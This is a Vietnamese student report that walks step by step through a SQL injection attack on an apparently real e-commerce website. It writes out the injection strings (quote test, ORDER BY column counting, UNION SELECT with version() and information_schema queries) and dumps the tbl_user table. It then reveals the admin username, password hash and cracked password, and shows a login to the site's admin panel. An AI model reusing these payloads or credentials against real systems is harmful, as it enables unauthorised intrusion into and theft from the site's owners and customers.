HUỲNH QUỐC NHA
LỚP 12TLT.CNTT
MÃ SINH VIÊN: 102120324
WEB HACK : />Trang gốc chọn để hack : />Hình 1 : Trang web gốc
Ta kiểm tra , bằng cách thêm dấu nháy “ ‘ ” sau URL : …. Id=294 : />frame=product_detail&id=294%27
Hình 2 : Kiểm tra trang web lỗi
Bước 2:Đếm số cột dùng order by đế xác định cột. Ban đầu mình thử đoán số column là 1.
Ta nhập vào link sau : />%201
Và kết quả là :
Hình 3 : kết quả bình thường khi thử với “ order by 1 ”
Ta tiếp tục thử với “ order bay 15 ”
Kết quả là :
Hình 4 : kết quả vẩn bình thường khi thử với “ order by 15 ”
Ta tiếp tục thử với “ order by 16 ”
Kết quả là :
Hình 5 : Kết quả lỗi khi thử với “ order by 16 ”
Vậy ta kết luận có 15 cột
Bước 3: Ta sử dụng Union liên kết 2 câu truy vấn, tìm table cần khai thác thông qua
information_schema.Tables
Đầu tiên thực hiện Union
/>%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015
Ta có kết quả :
Hinh 6: Kết quả khi ta sử dụng Union để tìm ra cột lỗi
Như vậy a đã biết được cột lỗi là cột thứ : 6
Tiếp đến ta sử dụng hàm version() để show ra version .version() đặt ở 1 trong vị trí các column bị lỗi.ở
đây mình đặt ở column số 6
/>%201,%202,3,4,5,%20version(),%207,%208,%209,%2010,%2011,%2012,13,14,15
và ta có kết quả
Hình 7 : Kết quả kiểm tra phiên bản
Vậy ta có kết quả phiên bản là 5.1.73
Bây giờ ta tìm tất cả các Table của database
/>%201,2,3,4,5,group_concat(unhex(hex(table_name))),%207,8,9,10,11,12,13,14,15%20from
%20information_schema.tables
Kết quả là :
Hình 8: Kết quả truy vấn các Table của database
Tất cả các table của Database :
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPL
ICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,
GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTIT
IONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINT
S,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESS
ION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_P
RIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,gopy,tbl_config,tbl_cont
ent,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_pr
oduct_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor,thongtink
hachhang
Bước 4 trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên, ở đây
ta chỉ chú ý đến tbl_user , để ta tìm các trường trong bảng này
/>%201,2,3,4,5,%20group_concat(unhex(hex(column_name))),
%207,%208,%209,%2010,%2011,12,13,14,15%20from%20information_schema.columns%20where
%20table_name=0x74626C5F75736572
Kết quả :
Hình 9: Kết quả tìm các trường trong bảng tbl_user
Vậy ta có 3 trường trong bảng này là id,uid,pwd
Bước 5: Vậy là ta có talbe và column cần thiết rôi ta chỉ việc khai thác thông tin ở đây , đó là uid và
pwd .
Lấy thông tin uid và pwd bằng câu truy vấn sau :
/>%201,2,3,4,5,group_concat(uid,0x2f,pwd),7,8,9,10,11,12,13,14,15%20from%20tbl_user%20 %20-
Kết quả :
Hình 10: Kết quả truy vấn uid và pwd
Vậy ta có kết quả là : admin/e3976d13683589d21ed11314e7254778
Nghĩa là uid : admin , pwd : e3976d13683589d21ed11314e7254778 , Ta mã hóa ra : 015243
Vậy ta đã có thông tin đăng nhập quản trị, ta chỉ việc tìm đến và đăng nhập
/>Hình 11 : Trang đăng nhập
Đăng nhập với Username : admin Password : 015243
Nhấn button Đăng Nhập
Và đây là kết quả:
Hình 12 : Trang Quản trị website